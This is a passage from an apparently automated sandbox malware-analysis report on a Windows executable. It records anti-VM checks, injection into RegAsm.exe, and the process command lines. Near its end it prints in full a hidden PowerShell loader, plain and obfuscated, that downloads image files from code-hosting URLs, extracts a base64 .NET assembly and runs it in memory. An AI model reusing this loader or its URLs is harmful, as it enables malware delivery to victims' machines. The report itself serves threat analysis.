                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2F30000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2FC0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4FC0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1968
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1775
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4012
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5813
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 846
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 1006
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_0-2345
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep count: 4012 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep count: 5813 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep time: -17524406870024063s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4928 Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5312 Thread sleep count: 846 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5312 Thread sleep count: 1006 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8064 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00007FF7D6FD204C
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00007FF7D6FD64E4
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QEMU Virtual CPU
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: RegAsm.exe, 0000000A.00000002.2113803747.0000000005930000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                  Source: wscript.exe, 00000003.00000003.1752918437.000001FD20754000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00007FF7D6FD1D28
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7D6FD8494
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD8790 SetUnhandledExceptionFilter, 0_2_00007FF7D6FD8790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: amsi64_7664.amsi.csv, type: OTHER
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 7476, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 8044, type: MEMORYSTR
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.cs Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F7C008
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '…
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#hm#a#bp#gu#b#bk#ge#z#bh#hm#lwbn#hm#z#bn#gg#agbq#c8#z#bv#hc#bgbs#g8#yqbk#hm#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#mq#4#de#mq#3#dm#nq#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz
#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD11CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF7D6FD11CC
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
